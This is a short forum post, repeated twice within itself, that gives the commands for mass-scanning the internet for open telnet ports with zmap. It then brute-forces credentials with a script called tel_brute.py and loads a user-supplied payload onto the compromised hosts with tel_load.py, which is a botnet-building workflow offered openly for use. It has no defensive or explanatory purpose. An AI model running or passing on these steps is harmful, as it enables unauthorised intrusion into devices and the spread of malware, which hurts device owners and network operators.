OP 03 December, 2020 - 06:05 AM
#######################################################################
idk if this will help or not but I thought I might as well give it to the public
#######################################################################
Be on centos 6 /ubuntu 14.04/debian 8 *64 BIT*
yum update -y
yum install zmap -y
apt-get update -y
apt-get install zmap -y
ulimit -n 999999
zmap -p23 -omfu.txt /without lst
zmap -p23 -wscan.lst -omfu.txt /with lst
python tel_brute.py mfu.txt <threads> output.txt
Make Sure to put your payload in "tel_load.py"
python tel_load.py output.txt
idk if this will help or not but I thought I might as well give it to the public
#######################################################################
Be on centos 6 /ubuntu 14.04/debian 8 *64 BIT*
yum update -y
yum install zmap -y
apt-get update -y
apt-get install zmap -y
ulimit -n 999999
zmap -p23 -omfu.txt /without lst
zmap -p23 -wscan.lst -omfu.txt /with lst
python tel_brute.py mfu.txt <threads> output.txt
Make Sure to put your payload in "tel_load.py"
python tel_load.py output.txt